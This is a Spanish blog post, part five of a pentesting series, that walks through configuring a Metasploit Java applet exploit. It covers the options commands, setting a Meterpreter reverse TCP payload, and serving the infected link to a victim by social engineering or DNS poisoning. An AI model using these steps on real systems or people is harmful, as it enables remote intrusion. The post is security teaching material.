29 ene 2013

Episodio de Pentesting (Parte V)

Hola! hoy seguiremos con nuestra cadena Episodio de Pentesting hablando sobre el proceso de configuración del exploit que seleccionamos en el capítulo anterior.

Lo primero que debemos hacer es llamar al exploit, pero si no nos sabemos la ruta exacta podemosutilizar la función search de Metasploit. Se ve mejor en esta imagen:

(Configuración básica de Metasploit)

En la imagen de arriba podemos observar que si hacemos un “show options”, se nos muestran los parámetros de configuración modificables para el exploit, y su configuración por defecto. Al lado de cada parámetro viene una breve descripción del mismo, por lo que no me voy a extender demasiado. Pero es importante echar un vistazo a SRVHOST, SRVPORT, LHOST y para este exploit en concreto, podemos configurar el nombre del applet malicioso modificando APPLETNAME, e incluso la firma del applet con CERTN. Los parámetros se modifican como en el siguiente ejemplo:

“set APPLETNAME EXPLOIT”

A continuación, la parte más importante de la configuración de un exploit consiste en la elección del Payload, pues será el programa que se encargará de realizar la conexión inversa desde la víctima hasta el host. En este caso, vamos a utilizar el payload más famoso de Metasploit que se llama Meterpreter, y para ser más exactos, en su versión de puertos TCP. Dicho esto, el paso siguiente es setearlo en nuestro exploit, dando la siguiente instrucción:

“set PAYLOAD windows/meterpreter/reverse_tcp”

Una vez configurado completamente el exploit con las opciones que necesitemos escribimos en la consola de MSF “exploit” y automáticamente MSF montará el servidor web con el contenido infectado. De forma predeterminada, MSF monta la inyección del exploit en una URL aleatoria del tipo http://127.0.0.1/XXXXXXX pero si queremos especificar un nombre en la dirección tendremos que configurar URIPATH en la configuración del exploit.

Ahora solo deberemos hacer que la víctima entre en el enlace y permita la instalación del complemento de Java. Para ello podríamos hacer uso de ingeniería inversa, a través de un mail o de cualquier otro servicio, pero puesto que suponemos que la víctima está en la misma red local, vamos a usar DNS Poisoning, lo que explicaremos a continuación.

Eso es todo por hoy, saludos!

No hay comentarios:

Publicar un comentario